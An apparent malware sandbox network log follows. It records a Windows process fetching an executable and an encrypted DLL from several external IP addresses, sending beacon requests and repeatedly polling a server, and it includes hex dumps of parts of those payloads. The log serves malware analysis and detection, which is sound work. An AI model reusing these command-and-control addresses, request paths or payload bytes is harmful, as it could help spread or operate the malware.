Oct 3, 2022 17:42:20.375737906 CEST	110	IN	Data Raw: 02 00 06 2a 1e 02 7b 0b 01 00 04 2a 3a 02 03 7d 0b 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 0c 01 00 04 2a 32 02 7b 15 01 00 04 6f fb 00 00 0a 2a 5e 02 7b 15 01 00 04 02 7b 15 01 00 04 6f fb 00 00 0a 6f fc 00 00 0a 2a 3a 02 17 7d 0d 01 00 04 02 28 Data Ascii: {:}(m{2{o^{{oo:}(m:}(mJ{ooJ{oxo2{ob{oso(,(ooo(f(ooo(z,
Oct 3, 2022 17:42:20.375756979 CEST	111	IN	Data Raw: 00 00 0a 02 03 28 7a 00 00 0a 2a 3a 02 7b 30 01 00 04 02 14 6f 74 00 00 0a 2a 3a 02 7b 2f 01 00 04 02 14 6f 74 00 00 0a 2a 3a 02 7b 2e 01 00 04 02 14 6f 74 00 00 0a 2a 1e 02 7b 43 01 00 04 2a 52 02 03 7d 43 01 00 04 02 02 7b 43 01 00 04 28 29 00 Data Ascii: (z:{0ot:{/ot:{.ot{CR}C{C(){>2{Fox6{Fo{?r{>,{Eoo}?{@r{>-{Eoo}@B(({C(){A({B
Oct 3, 2022 17:42:20.375775099 CEST	112	IN	Data Raw: 78 01 00 04 2a 22 02 03 7d 78 01 00 04 2a 1e 02 7b 79 01 00 04 2a 22 02 03 7d 79 01 00 04 2a 1e 02 7b 7a 01 00 04 2a 22 02 03 7d 7a 01 00 04 2a 1e 02 7b 7b 01 00 04 2a 22 02 03 7d 7b 01 00 04 2a 1e 02 7b 7c 01 00 04 2a 22 02 03 7d 7c 01 00 04 2a Data Ascii: x"}x{y"}y{z"}z{{"}{{\|"}\|{}"}}{~"}~{"}{"}{"}{"}{"}("(w"?(y(}*2(
Oct 3, 2022 17:42:20.375793934 CEST	114	IN	Data Raw: 02 00 0a 02 28 e8 03 00 06 14 6f 51 02 00 0a 2a 1e 02 7b c7 01 00 04 2a 22 02 03 7d c7 01 00 04 2a 1e 02 7b c8 01 00 04 2a 22 02 03 7d c8 01 00 04 2a 1e 02 7b c9 01 00 04 2a 22 02 03 7d c9 01 00 04 2a 1e 02 28 fd 00 00 0a 2a c2 02 28 fd 00 00 0a Data Ascii: (oQ{"}{"}{"}(("?"""?""sR({"}{"}{"}{"}{"}{"}{"}*
Oct 3, 2022 17:42:20.402920961 CEST	115	IN	Data Raw: 28 7b 00 00 0a 6f 84 02 00 0a 73 85 02 00 0a 80 4c 02 00 04 7e 4c 02 00 04 2a 1a 7e 4d 02 00 04 2a 1e 02 80 4d 02 00 04 2a ae 7e 4e 02 00 04 2d 1e 72 2c 23 00 70 d0 5b 00 00 02 28 7b 00 00 0a 6f 84 02 00 0a 73 85 02 00 0a 80 4e 02 00 04 7e 4e 02 Data Ascii: ({osL~L~MM~N-r,#p[({osN~N~OO~P(Vs(t\P:(}Q.sT*0Gs}(( ,rps!z( ,rps!z}}
Oct 3, 2022 17:42:20.637722969 CEST	354	OUT	GET /software.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: E Host: 85.31.46.167 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:42:20.669107914 CEST	355	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:42:20 GMT Server: Apache/2.4.41 (Ubuntu) Pragma: public Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="soft"; Content-Transfer-Encoding: binary Content-Length: 3947920 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ ``TO 2(<@8 H.text `.rsrc2 @@.reloc@@BHh@ET;((~-rp(os~~j(r=p~otj(rMp~otj(rp~otj(rp~otj(rp~otj(rp~otj(rp~ot~(Vs(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49713	208.67.104.97	80	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 17:43:41.216011047 CEST	4575	OUT	GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 208.67.104.97 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:43.067961931 CEST	4575	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49714	107.182.129.235	80	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 17:43:43.209049940 CEST	4576	OUT	GET /storage/ping.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 0 Host: 107.182.129.235 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:43.236627102 CEST	4576	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 17 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 55 77 55 6f 6f 6f 49 49 72 77 67 68 32 34 75 75 55 Data Ascii: UwUoooIIrwgh24uuU
Oct 3, 2022 17:43:43.308698893 CEST	4577	OUT	GET /storage/extension.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 107.182.129.235 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:43.336393118 CEST	4578	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:43 GMT Server: Apache/2.4.41 (Ubuntu) Pragma: public Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Transfer-Encoding: binary Content-Length: 94224 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: f9 f1 a9 b8 8b 6d 69 b2 02 e6 7d 3b a6 18 dc 46 22 cd 29 c1 54 8d 11 27 4b 3b 1b ff ec e2 4f bb 59 30 3a cd fb c8 c6 19 33 6a e8 b1 5c 17 49 6a ea 32 52 c5 89 50 17 fc 06 dd 43 07 19 e2 71 a9 7c d1 32 a8 0e fe be ec b3 69 52 32 57 f5 46 e8 b4 ab 43 3d 4d 55 b9 a4 16 cb 8b 9e 85 48 36 99 ea f5 41 e4 94 1a 97 d3 d7 40 7f fa 4f a6 63 1a 89 89 4d 87 78 38 ce 94 d2 e4 b0 4c ae e0 2d 20 c9 88 ab 62 96 84 7c 12 43 b2 c0 e7 8e a4 5a 7d a5 77 d7 94 2e d1 6c 1a 61 cd 61 54 b4 87 c2 a5 62 72 2c 19 c8 18 36 77 23 06 6a c2 50 d9 8c 6c 69 f4 88 3d fc b4 ca 1b 0e c0 6f ac 1e b2 92 93 cf ee 53 e9 7b ab eb 52 94 a4 e6 e4 2e 94 d9 d2 35 d5 a0 15 92 ec a7 23 3b 93 d0 94 82 04 2d fb d3 f1 e8 62 2b 19 e3 8b 47 28 90 3e cb 02 51 05 b9 e0 f5 a5 69 4e 7b 90 2b 79 0c 1d d0 5a 43 e7 ae 7a 33 73 45 cd f0 ae fa 54 0d d3 32 df 4a 10 84 ce 33 bf 39 55 d6 34 26 f6 b2 50 d4 e5 c7 c7 cb d7 b0 e1 89 22 77 49 fa a4 b9 cb e0 40 cb c3 b5 ae da 78 25 3e 90 be 44 0e d5 80 27 7a 09 5e fb 01 d3 d4 5e 28 bc 07 0d a4 87 4e 43 ca 5b 5b 6b d9 0a ba c8 f0 ff 95 eb ca 9c d2 56 5d 47 f1 d2 29 65 0f 7f b4 94 bf 60 c5 c5 d4 ea b1 07 18 ee 4b 2f 4c d0 55 6c 12 19 46 1f 15 22 8a ed 38 24 16 41 64 ef fa aa e4 3a 69 b5 67 a6 f4 30 81 64 db 0f d8 5b 2e a9 cf 54 22 6c 90 55 c0 4d 00 3d 17 30 b1 b0 ef 2c de d9 2c e7 99 83 6b 75 d4 57 2c c3 d1 f7 f9 f3 37 60 51 cf 46 69 3d 77 13 f9 e3 75 f1 dc 3a 8f 97 51 2d ca 52 a0 7d 30 1c c8 eb ac 4c ba ad 82 8f bd 6e c9 0a 1c 74 a4 6e 76 c0 1f eb 06 07 7a c3 c0 18 0c 65 9e e8 49 c0 43 00 01 b3 b6 d2 39 bf 56 8c 7e 31 2b 5b 5d 06 cb 9f 37 f5 04 af 78 51 1d e7 a4 f8 12 02 f6 b0 06 24 81 4c 00 1c 6f e9 65 51 c7 86 2f c8 62 c9 82 f8 5a 96 0c e4 de c1 e4 70 5d 96 3b 69 2a 29 d1 a6 bd 96 23 b9 62 ef 14 f0 25 31 95 ea 11 0d 8c db bf ec f8 40 a0 17 82 47 ff e1 5b 02 97 d9 b7 9b a6 85 0d 2f 00 63 ca 8e 5a 19 f7 ea 08 d1 81 f4 47 95 3a 0f a1 6e 90 a8 45 d3 69 08 4f af 9c 6f af 55 1e 42 c9 50 78 d3 de b2 de 0b 31 7b 2c 61 10 da cf f3 f6 23 6b cd ad 64 6a be ed 4c 34 cc 0f d2 7d da 64 3c 95 14 a4 a8 d5 d9 49 79 79 c4 a0 4a a7 fb 66 ee 57 c4 10 2c 5e 76 56 da 41 6f d4 4b d4 22 2b 4f 58 38 21 46 a7 02 f1 59 50 8b ea bd f5 75 b6 2d e6 ed 42 69 6b eb a5 5b e2 75 05 9b c1 26 57 74 bc 84 50 af f4 7f 6d cf 00 10 8e 5e 20 c8 9a c9 6b 7e e2 01 2e a3 90 6c fe d3 6f a6 7a 4d 56 1c 21 73 2e ed b6 68 80 f0 c3 7b 0f 6e 32 3b 7a d7 d9 cc 4b db 04 3f 53 c5 93 f4 2d 96 0d f9 65 57 e0 e0 ac cf 63 dc fa f2 1b e6 2d 56 dd 62 67 ff ff 39 da 49 c5 05 67 ba 78 fa 67 cb b7 ba ef 7d c3 27 e6 35 d2 c0 28 2a 50 b3 e8 b7 93 c8 4a 23 97 18 3a b5 49 53 b4 08 44 7d 8e 76 8a 97 c3 09 ea 9d 15 6a 4b 39 03 4c 51 46 aa 0f 00 Data Ascii: mi};F")T'K;OY0:3j\Ij2RPCq\|2iR2WFC=MUH6A@OcMx8L- b\|CZ}w.laaTbr,6w#jPli=oS{R.5#;-b+G(>QiN{+yZCz3sET2J39U4&P"wI@x%>D'z^^(NC[[kV]G)e`K/LUlF"8$Ad:ig0d[.T"lUM=0,,kuW,7`QFi=wu:Q-R}0LntnvzeIC9V~1+[]7xQ$LoeQ/bZp];i)#b%1@G[/cZG:nEiOoUBPx1{,a#kdjL4}d<IyyJfW,^vVAoK"+OX8!FYPu-Bik[u&WtPm^ k~.lozMV!s.h{n2;zK?S-eWc-Vbg9Igxg}'5(PJ#:ISD}vjK9LQF
Oct 3, 2022 17:43:43.336417913 CEST	4579	IN	Data Raw: 6f 4f 68 56 80 cb c2 29 e2 a1 68 c5 76 5e 2d 04 d2 46 81 ff 08 3c 8f 84 16 ba bb 56 68 88 31 b9 c0 b3 d7 21 97 b1 05 21 8b c0 0f 42 59 63 04 9a 43 3f 8b f4 44 32 04 a3 b3 c2 c1 32 d5 4b 28 a2 a0 36 f6 19 9a 1b 42 d5 15 bd 92 44 90 aa 61 79 b9 b8 Data Ascii: oOhV)hv^-F<Vh1!!BYcC?D22K(6BDay=\|'[1~YB:/A`=FKqTw-blBC:>e5.jNK=ZGj:V.:gP~tm~ "A1jNR[PX~LgT%
Oct 3, 2022 17:43:43.336436033 CEST	4581	IN	Data Raw: 20 2f b2 fc fb 3b 22 62 e0 b2 2f c2 80 40 84 cb 02 1f 37 3d 0d 0c 1a 55 11 be 34 89 65 ce bc 3a 9c 5c 05 87 3d bb e8 1a 84 38 46 23 32 4d fc be ea 80 62 5b 19 72 10 35 1e b7 8a 98 4d a2 eb 87 6c 74 d4 1d e4 9d 35 68 f5 a9 e5 08 ea 2b 4d 6b 11 a1 Data Ascii: /;"b/@7=U4e:\=8F#2Mb[r5Mlt5h+Mk>eOk6wB!mMf@yHW0>GX\|2";J=MgPAqTW/j*qO}([=\|Dltn3)fF@}Mr
Oct 3, 2022 17:43:43.336455107 CEST	4582	IN	Data Raw: a7 85 09 11 e8 87 fa 45 9c 6e e3 22 3a 8b 3a 37 cb 18 c6 c9 0c 95 19 a5 fd b0 6a 49 fe 1b fe ae 5a 87 a0 39 48 bd 07 52 c2 4c a3 6c d5 9e 43 04 16 b3 be ff 0d 7e 75 6b 76 df 83 39 76 49 20 81 05 f4 44 2b 77 e4 4d b2 06 16 49 eb 4f 6e 06 26 32 98 Data Ascii: En"::7jIZ9HRLlC~ukv9vI D+wMIOn&2wSCi-Mxyi=&{32cT[\wc70#q6F=hbB4P\U8BOpw0IZdET,.k]N{S!d*$;q,
Oct 3, 2022 17:43:43.336472034 CEST	4583	IN	Data Raw: 4d 96 87 7f 63 be 6a e0 a7 12 2c 76 97 11 b2 61 1a 8c 52 86 70 00 11 79 15 ef 90 33 7a 8b 69 b8 d1 93 89 5d 20 a4 63 5d de 1c 51 fe 73 46 db 21 4d c9 ea f7 67 60 2f e1 a9 04 18 e8 c1 d7 b3 44 78 0e 75 21 3a 8b 07 a0 01 19 e6 77 51 13 23 87 dc 93 Data Ascii: Mcj,vaRpy3zi] c]QsF!Mg`/Dxu!:wQ#[Xs~w0)w(cU6@(R#a0Sj!P[N^/c&;<5`V(Tys6gMn ?.Vz]X6?hGynK;YVYK
Oct 3, 2022 17:43:43.336488008 CEST	4585	IN	Data Raw: 21 b9 4c 3c 58 1f 3e b0 46 f6 ca 4f d4 3b 5d 88 04 a1 eb 28 78 da b0 51 20 02 9f d0 8e b2 b6 6e de 77 3f 8e 24 81 58 61 dc f1 2f 50 d4 78 14 e3 ed 48 fd 34 28 b3 3c 8d c4 b1 fb b3 81 1a a3 cc 05 30 f2 1b f9 e2 ee 54 f2 cb e6 99 0e 52 e0 62 83 e1 Data Ascii: !L<X>FO;](xQ nw?$Xa/PxH4(<0TRbY\|/V)s8igrzEm<G_+/G.t#\|1;'Ui9yQYXP^^8]7_Y(*Mt%k+p.(zg
Oct 3, 2022 17:43:43.336503983 CEST	4586	IN	Data Raw: 68 3c a5 e0 8c 19 ff b7 b6 66 fd 50 d8 d9 59 25 6f 43 24 25 d2 09 74 d5 15 b3 3e 2c 54 69 50 e7 2e cc 3b db c1 ab f1 19 b7 ff f3 7e 50 4b 36 6e 85 9a 1e 0e d4 5d 9f a5 ae ce 78 88 33 b5 ca 41 3d a1 fd 67 c3 9e 53 a3 30 2c b4 41 90 66 8e 73 85 77 Data Ascii: h<fPY%oC$%t>,TiP.;~PK6n]x3A=gS0,Afswy\cCDw6m&g}fom?ZIhA/-'1D8$$@S9&h0a7lLl 9Wyu0
Oct 3, 2022 17:43:43.336520910 CEST	4587	IN	Data Raw: 24 ad 2e af 1c 5c fa b9 f9 cf 44 8d d0 e8 a4 24 09 87 fb a0 14 ac b1 57 7d 53 55 c3 8d 9b d7 93 44 32 17 30 78 13 2a 5a 0b e8 52 6e 89 17 ad ea 8f 4a 5f d2 cb 2f 97 d7 ed f3 95 a9 50 7f 49 f6 6f 84 95 c0 12 8d 28 dd a7 d0 4c 02 91 fe 7f 5a bd 70 Data Ascii: $.\D$W}SUD20x*ZRnJ_/PIo(LZp1+,j%MClj5NZ32Pu0'1b}V}JCC;H@mX`5Xgw[iag7X"G{K
Oct 3, 2022 17:43:43.336536884 CEST	4588	IN	Data Raw: d9 c8 d5 72 52 2b 1f a9 ce 14 25 d2 bc be a1 c8 e3 db 90 60 1d e7 64 da 5b 9b 91 87 b9 96 91 4c f6 68 b8 24 66 6d 17 12 16 9b ce c1 4d ad 21 e8 ac e7 91 d6 2b 8a 70 d8 07 6d f6 7c 51 aa ae 5c 46 a3 5b a8 63 78 5a 2f b7 91 d6 fb a1 2d a8 64 d9 d7 Data Ascii: rR+%`d[Lh$fmM!+pm\|Q\F[cxZ/-dIa_hYwOi@{c5$:u[x{'B4oXa\H_f$%^gZr~Q> F>!<}Nw^~a\"[T/B&
Oct 3, 2022 17:43:43.336554050 CEST	4590	IN	Data Raw: 20 4c ba 5f 6e 12 80 56 cf 7a 46 07 bc 39 50 89 7d 09 31 b0 10 e3 35 18 30 d6 9b 45 e7 53 0e 8b 5a 89 04 ed 1f 63 58 26 ed 05 56 f6 04 b0 4b 49 41 ec 72 6f 33 13 31 cb 04 d8 ae a2 60 68 7a 07 c2 58 2d 03 77 38 4e e5 40 a5 1d e8 35 b1 0b 06 8e e7 Data Ascii: L_nVzF9P}150ESZcX&VKIAro31`hzX-w8N@5Yf8w}-^)Eja.] )jKNb$Etb6k@+P/zksThrw^NWchEZX(E\8J9alG/Cm-Q95Q@J1_lHl
Oct 3, 2022 17:43:43.363478899 CEST	4591	IN	Data Raw: df 45 f8 57 13 1c bc db 95 00 23 48 83 a9 9d cc 72 58 44 3a 28 86 1f 1a ff f8 b0 74 76 a4 81 88 29 df fd 47 64 5f 13 3c 75 e5 f1 4c fe d9 14 bc 60 1b ac a3 1b 17 61 a9 b7 fa 7f c7 86 61 d6 5f f0 b1 f3 ff 55 3d 50 be ad 32 1d c1 19 a0 b5 56 32 5f Data Ascii: EW#HrXD:(tv)Gd_<uL`aa_U=P2V2_bFM{!wahJs m<'Js{>vB;C+M]5r4:kRP:OjQUFLDQKp+CNZ!cQ:*V

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49715	171.22.30.106	80	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 17:43:43.576761007 CEST	4677	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:44.124228001 CEST	4677	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:43:46.440035105 CEST	4677	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:46.964653969 CEST	4678	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:43:49.006376982 CEST	4678	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:49.520315886 CEST	4679	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:43:51.568469048 CEST	4679	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:52.092350960 CEST	4680	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:43:54.145493984 CEST	4680	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:54.672375917 CEST	4680	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:43:56.709244013 CEST	4681	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:57.240268946 CEST	4682	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:43:59.286329031 CEST	4682	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:59.814461946 CEST	4683	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:44:02.014844894 CEST	4683	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:44:02.541059971 CEST	4683	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:44:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
